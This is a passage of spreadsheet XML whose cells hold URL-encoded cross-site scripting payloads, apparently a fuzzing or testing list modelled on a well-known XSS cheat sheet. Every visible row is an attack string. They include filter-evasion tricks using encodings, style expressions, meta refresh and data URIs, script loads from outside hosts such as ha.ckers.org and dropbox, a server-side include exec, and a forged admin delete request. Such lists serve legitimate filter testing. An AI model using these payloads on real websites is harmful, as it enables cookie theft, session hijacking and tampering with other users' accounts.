        <v>%3CBGSOUND%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="3" t="s">
        <v>504</v>
      </c>
      <c r="B506" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBR%20SIZE%3D%22%26%7Balert%28%27XSS%27%29%7D%22%3E</v>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="3" t="s">
        <v>505</v>
      </c>
      <c r="B507" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CLINK%20REL%3D%22stylesheet%22%20HREF%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="3" t="s">
        <v>506</v>
      </c>
      <c r="B508" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CLINK%20REL%3D%22stylesheet%22%20HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E</v>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="3" t="s">
        <v>507</v>
      </c>
      <c r="B509" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="3" t="s">
        <v>508</v>
      </c>
      <c r="B510" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22Link%22%20Content%3D%22%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%3E%3B%20REL%3Dstylesheet%22%3E</v>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="3" t="s">
        <v>509</v>
      </c>
      <c r="B511" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="3" t="s">
        <v>510</v>
      </c>
      <c r="B512" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3E%40im%5Cport%27%5Cja%5Cvasc%5Cript%3Aalert%28%22XSS%22%29%27%3B%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="3" t="s">
        <v>511</v>
      </c>
      <c r="B513" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20STYLE%3D%22xss%3Aexpr%2F%2AXSS%2A%2Fession%28alert%28%27XSS%27%29%29%22%3E</v>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="3" t="s">
        <v>512</v>
      </c>
      <c r="B514" s="4" t="str">
        <f t="shared" si="1"/>
        <v>exp%2F%2A%3CA%20STYLE%3D%27no%5Cxss%3Anoxss%28%22%2A%2F%2F%2A%22%29%3Bxss%3Aex%2F%2AXSS%2A%2F%2F%2A%2F%2A%2Fpression%28alert%28%22XSS%22%29%29%27%3E</v>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="3" t="s">
        <v>513</v>
      </c>
      <c r="B515" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%20TYPE%3D%22text%2Fjavascript%22%3Ealert%28%27XSS%27%29%3B%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="3" t="s">
        <v>514</v>
      </c>
      <c r="B516" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3E.XSS%7Bbackground-image%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%3B%7D%3C%2FSTYLE%3E%3CA%20CLASS%3DXSS%3E%3C%2FA%3E</v>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="3" t="s">
        <v>515</v>
      </c>
      <c r="B517" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%20type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%7D%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="3" t="s">
        <v>515</v>
      </c>
      <c r="B518" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%20type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%7D%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="3" t="s">
        <v>516</v>
      </c>
      <c r="B519" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXSS%20STYLE%3D%22xss%3Aexpression%28alert%28%27XSS%27%29%29%22%3E</v>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="3" t="s">
        <v>517</v>
      </c>
      <c r="B520" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXSS%20STYLE%3D%22behavior%3A%20url%28xss.htc%29%3B%22%3E</v>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="3" t="s">
        <v>518</v>
      </c>
      <c r="B521" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%C2%BCscript%C2%BEalert%28%C2%A2XSS%C2%A2%29%C2%BC%2Fscript%C2%BE</v>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="3" t="s">
        <v>519</v>
      </c>
      <c r="B522" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3Burl%3Djavascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="3" t="s">
        <v>520</v>
      </c>
      <c r="B523" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3Burl%3Ddata%3Atext%2Fhtml%20base64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3E</v>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="3" t="s">
        <v>521</v>
      </c>
      <c r="B524" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3B%20URL%3Dhttp%3A%2F%2F%3BURL%3Djavascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="3" t="s">
        <v>522</v>
      </c>
      <c r="B525" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E%3C%2FIFRAME%3E</v>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="3" t="s">
        <v>523</v>
      </c>
      <c r="B526" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIFRAME%20SRC%3D%23%20onmouseover%3D%22alert%28document.cookie%29%22%3E%3C%2FIFRAME%3E</v>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="3" t="s">
        <v>524</v>
      </c>
      <c r="B527" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CFRAMESET%3E%3CFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E%3C%2FFRAMESET%3E</v>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="3" t="s">
        <v>525</v>
      </c>
      <c r="B528" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CTABLE%20BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="3" t="s">
        <v>526</v>
      </c>
      <c r="B529" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CTABLE%3E%3CTD%20BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="3" t="s">
        <v>527</v>
      </c>
      <c r="B530" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22background-image%3A%20url%28javascript%3Aalert%28%27XSS%27%29%29%22%3E</v>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="3" t="s">
        <v>528</v>
      </c>
      <c r="B531" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22background-image%3A%5C0075%5C0072%5C006C%5C0028%27%5C006a%5C0061%5C0076%5C0061%5C0073%5C0063%5C0072%5C0069%5C0070%5C0074%5C003a%5C0061%5C006c%5C0065%5C0072%5C0074%5C0028.1027%5C0058.1053%5C0053%5C0027%5C0029%27%5C0029%22%3E</v>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="3" t="s">
        <v>529</v>
      </c>
      <c r="B532" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22background-image%3A%20url%28%26%231%3Bjavascript%3Aalert%28%27XSS%27%29%29%22%3E</v>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="3" t="s">
        <v>530</v>
      </c>
      <c r="B533" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22width%3A%20expression%28alert%28%27XSS%27%29%29%3B%22%3E</v>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="3" t="s">
        <v>531</v>
      </c>
      <c r="B534" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBASE%20HREF%3D%22javascript%3Aalert%28%27XSS%27%29%3B%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="3" t="s">
        <v>532</v>
      </c>
      <c r="B535" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3COBJECT%20TYPE%3D%22text%2Fx-scriptlet%22%20DATA%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FOBJECT%3E</v>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="3" t="s">
        <v>533</v>
      </c>
      <c r="B536" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CEMBED%20SRC%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH%20A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv%20MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs%20aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw%20IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh%20TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22%20type%3D%22image%2Fsvg%2Bxml%22%20AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E</v>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="3" t="s">
        <v>534</v>
      </c>
      <c r="B537" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="3" t="s">
        <v>535</v>
      </c>
      <c r="B538" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%23exec%20cmd%3D%22%2Fbin%2Fecho%20%27%3CSCR%27%22--%3E%3C%21--%23exec%20cmd%3D%22%2Fbin%2Fecho%20%27IPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E</v>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="3" t="s">
        <v>536</v>
      </c>
      <c r="B539" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3F%20echo%28%27%3CSCR%29%27%3Becho%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B%20%3F%3E</v>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="3" t="s">
        <v>537</v>
      </c>
      <c r="B540" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E</v>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="3" t="s">
        <v>538</v>
      </c>
      <c r="B541" s="4" t="str">
        <f t="shared" si="1"/>
        <v>Redirect%20302%20%2Fa.jpg%20http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser</v>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="3" t="s">
        <v>539</v>
      </c>
      <c r="B542" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22Set-Cookie%22%20Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E</v>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="3" t="s">
        <v>540</v>
      </c>
      <c r="B543" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CHEAD%3E%3CMETA%20HTTP-EQUIV%3D%22CONTENT-TYPE%22%20CONTENT%3D%22text%2Fhtml%3B%20charset%3DUTF-7%22%3E%20%3C%2FHEAD%3E%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-</v>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="3" t="s">
        <v>541</v>
      </c>
      <c r="B544" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20a%3D%22%3E%22%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="3" t="s">
        <v>542</v>
      </c>
      <c r="B545" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20%3D%22%3E%22%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="3" t="s">
        <v>543</v>
      </c>
      <c r="B546" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20a%3D%22%3E%22%20%27%27%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="3" t="s">
        <v>544</v>
      </c>
      <c r="B547" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20%22a%3D%27%3E%27%22%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="3" t="s">
        <v>545</v>
      </c>
      <c r="B548" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20a%3D%60%3E%60%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="3" t="s">
        <v>546</v>
      </c>
      <c r="B549" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20a%3D%22%3E%27%3E%22%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="3" t="s">
        <v>547</v>
      </c>
      <c r="B550" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="3" t="s">
        <v>548</v>
      </c>
      <c r="B551" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CA%20HREF%3D%22http%3A%2F%2F66.102.7.147%2F%22%3EXSS%3C%2FA%3E</v>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="3" t="s">
        <v>549</v>
      </c>
      <c r="B552" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CA%20HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E</v>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="3" t="s">
        <v>550</v>
      </c>
      <c r="B553" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CA%20HREF%3D%22http%3A%2F%2F1113982867%2F%22%3EXSS%3C%2FA%3E</v>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="3" t="s">
        <v>551</v>
      </c>
      <c r="B554" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CA%20HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E</v>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="3" t="s">
        <v>552</v>
      </c>
      <c r="B555" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CA%20HREF%3D%22http%3A%2F%2F0102.0146.0007.00000223%2F%22%3EXSS%3C%2FA%3E</v>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="3" t="s">
        <v>553</v>
      </c>
      <c r="B556" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CA%20HREF%3D%22htt</v>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="3" t="s">
        <v>554</v>
      </c>
      <c r="B557" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20%2500%20src%3D%22%26Tab%3Bjavascript%3Aprompt%281%29%26Tab%3B%22%2500%3E</v>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="3" t="s">
        <v>555</v>
      </c>
      <c r="B558" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cstyle%3E%7Bfont-family%26colon%3B%27%3Ciframe%2Fonload%3Dconfirm%281%29%3E%27</v>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="3" t="s">
        <v>556</v>
      </c>
      <c r="B559" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%2Fonmouseover%3D%22javaSCRIPT%26colon%3Bconfirm%26lpar%3B1%26rpar%3B%22</v>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="3" t="s">
        <v>557</v>
      </c>
      <c r="B560" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CsVg%3E%3CscRipt%20%2500%3Ealert%26lpar%3B1%26rpar%3B%20%7BOpera%7D</v>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="3" t="s">
        <v>558</v>
      </c>
      <c r="B561" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%2Fsrc%3D%60%2500%60%20onerror%3Dthis.onerror%3Dconfirm%281%29</v>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="3" t="s">
        <v>559</v>
      </c>
      <c r="B562" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Cisindex%20formaction%3D%22javascript%26colon%3Bconfirm%281%29%22</v>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="3" t="s">
        <v>560</v>
      </c>
      <c r="B563" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%60%2500%60%26NewLine%3B%20onerror%3Dalert%281%29%26NewLine%3B</v>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="3" t="s">
        <v>561</v>
      </c>
      <c r="B564" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%2F%26Tab%3B%20src%3D%27https%3A%2F%2Fdl.dropbox.com%2Fu%2F13018058%2Fjs.js%27%20%2F%26Tab%3B%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="3" t="s">
        <v>562</v>
      </c>
      <c r="B565" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CScRipT%205-0%2A3%2B9%2F3%3D%3Eprompt%281%29%3C%2FScRipT%20giveanswerhere%3D%3F</v>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="3" t="s">
        <v>563</v>
      </c>
      <c r="B566" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fsrc%3D%22data%3Atext%2Fhtml%3B%26Tab%3Bbase64%26Tab%3B%2CPGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3D%3D%22%3E</v>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="3" t="s">
        <v>564</v>
      </c>
      <c r="B567" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%2F%2A%2500%2A%2F%3E%2F%2A%2500%2A%2Falert%281%29%2F%2A%2500%2A%2F%3C%2Fscript%20%2F%2A%2500%2A%2F</v>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="3" t="s">
        <v>565</v>
      </c>
      <c r="B568" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2334%3B%26%2362%3B%3Ch1%2Fonmouseover%3D%27%5Cu0061lert%281%29%27%3E%2500</v>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="3" t="s">
        <v>566</v>
      </c>
      <c r="B569" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fsrc%3D%22data%3Atext%2Fhtml%2C%3Csvg%20%26%23111%3B%26%23110%3Bload%3Dalert%281%29%3E%22%3E</v>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="3" t="s">
        <v>567</v>
      </c>
      <c r="B570" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20content%3D%22%26NewLine%3B%201%20%26NewLine%3B%3B%20JAVASCRIPT%26colon%3B%20alert%281%29%22%20http-equiv%3D%22refresh%22%2F%3E</v>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="3" t="s">
        <v>568</v>
      </c>
      <c r="B571" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%20xlink%3Ahref%3Ddata%26colon%3B%2Cwindow.open%28%27https%3A%2F%2Fwww.google.com%2F%27%29%3E%3C%2Fscript</v>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="3" t="s">
        <v>569</v>
      </c>
      <c r="B572" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%20x%3Ahref%3D%27https%3A%2F%2Fdl.dropbox.com%2Fu%2F13018058%2Fjs.js%27%20%7BOpera%7D</v>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="3" t="s">
        <v>570</v>
      </c>
      <c r="B573" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Djavascript%3Aconfirm%281%29%22%3E</v>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="3" t="s">
        <v>571</v>
      </c>
      <c r="B574" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3Djavascript%26colon%3Balert%26lpar%3Bdocument%26period%3Blocation%26rpar%3B%3E</v>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="3" t="s">
        <v>572</v>
      </c>
      <c r="B575" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Ca%20href%3D%22javascript%3A%5Cu0061lert%26%23x28%3B1%26%23x29%3B%22%3EX</v>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="3" t="s">
        <v>573</v>
      </c>
      <c r="B576" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fscript%3E%3Cimg%2F%2A%2500%2Fsrc%3D%22worksinchrome%26colon%3Bprompt%26%23x28%3B1%26%23x29%3B%22%2F%2500%2A%2Fonerror%3D%27eval%28src%29%27%3E</v>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="3" t="s">
        <v>574</v>
      </c>
      <c r="B577" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%2F%26%2309%3B%26%2310%3B%26%2311%3B%20src%3D%60%7E%60%20onerror%3Dprompt%281%29%3E</v>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="3" t="s">
        <v>575</v>
      </c>
      <c r="B578" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Ciframe%20%26%2309%3B%26%2310%3B%26%2311%3B%20src%3D%22javascript%26%2358%3Balert%281%29%22%26%2311%3B%26%2310%3B%26%2309%3B%3B%3E</v>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="3" t="s">
        <v>576</v>
      </c>
      <c r="B579" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22data%3Aapplication%2Fx-x509-user-cert%3B%26NewLine%3Bbase64%26NewLine%3B%2CPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg%3D%3D%22%26%2309%3B%26%2310%3B%26%2311%3B%3EX%3C%2Fa</v>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="3" t="s">
        <v>577</v>
      </c>
      <c r="B580" s="4" t="str">
        <f t="shared" si="1"/>
        <v>http%3A%2F%2Fwww.google%3Cscript%20.com%3Ealert%28document.location%29%3C%2Fscript</v>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="3" t="s">
        <v>578</v>
      </c>
      <c r="B581" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%26%2332%3Bhref%26%2361%3B%26%2391%3B%26%2300%3B%26%2393%3B%22%26%2300%3B%20onmouseover%3Dprompt%26%2340%3B1%26%2341%3B%26%2347%3B%26%2347%3B%22%3EXYZ%3C%2Fa</v>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="3" t="s">
        <v>579</v>
      </c>
      <c r="B582" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%2Fsrc%3D%40%26%2332%3B%26%2313%3B%20onerror%20%3D%20prompt%28%27%26%2349%3B%27%29</v>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="3" t="s">
        <v>580</v>
      </c>
      <c r="B583" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%2Fonload%3Dprompt%26%2340%3B%27%26%2388%3B%26%2383%3B%26%2383%3B%27%26%2341%3B</v>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="3" t="s">
        <v>581</v>
      </c>
      <c r="B584" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%5E__%5E%3Ealert%28String.fromCharCode%2849%29%29%3C%2Fscript%20%5E__%5E</v>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="3" t="s">
        <v>582</v>
      </c>
      <c r="B585" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fstyle%20%26%2332%3B%3E%3Cscript%20%26%2332%3B%20%3A-%28%3E%2F%2A%2A%2Falert%28document.location%29%2F%2A%2A%2F%3C%2Fscript%20%26%2332%3B%20%3A-%28</v>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="3" t="s">
        <v>583</v>
      </c>
      <c r="B586" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2300%3B%3C%2Fform%3E%3Cinput%20type%26%2361%3B%22date%22%20onfocus%3D%22alert%281%29%22%3E</v>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="3" t="s">
        <v>584</v>
      </c>
      <c r="B587" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Ctextarea%20%26%2313%3B%20onkeyup%3D%27%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%26%23x28%3B1%26%23x29%3B%27%3E</v>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="3" t="s">
        <v>585</v>
      </c>
      <c r="B588" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%2F%2A%2A%2A%2F%3E%2F%2A%2A%2A%2Fconfirm%28%27%5CuFF41%5CuFF4C%5CuFF45%5CuFF52%5CuFF54%5Cu1455%5CuFF11%5Cu1450%27%29%2F%2A%2A%2A%2F%3C%2Fscript%20%2F%2A%2A%2A%2F</v>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="3" t="s">
        <v>586</v>
      </c>
      <c r="B589" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20srcdoc%3D%27%26lt%3Bbody%20onload%3Dprompt%26lpar%3B1%26rpar%3B%26gt%3B%27%3E</v>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="3" t="s">
        <v>587</v>
      </c>
      <c r="B590" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%3Avoid%280%29%22%20onmouseover%3D%26NewLine%3Bjavascript%3Aalert%281%29%26NewLine%3B%3EX%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="3" t="s">
        <v>588</v>
      </c>
      <c r="B591" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%7E%7E%7E%3Ealert%280%250%29%3C%2Fscript%20%7E%7E%7E%3E</v>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="3" t="s">
        <v>589</v>
      </c>
      <c r="B592" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%2Fonload%3D%26lt%3B%21--%26%2309%3B%26gt%3B%26%2310%3Balert%26%2310%3B%26lpar%3B1%26rpar%3B%3E</v>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="3" t="s">
        <v>590</v>
      </c>
      <c r="B593" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2F%2F%2Fstyle%2F%2F%2F%3E%3Cspan%20%252F%20onmousemove%3D%27alert%26lpar%3B1%26rpar%3B%27%3ESPAN</v>
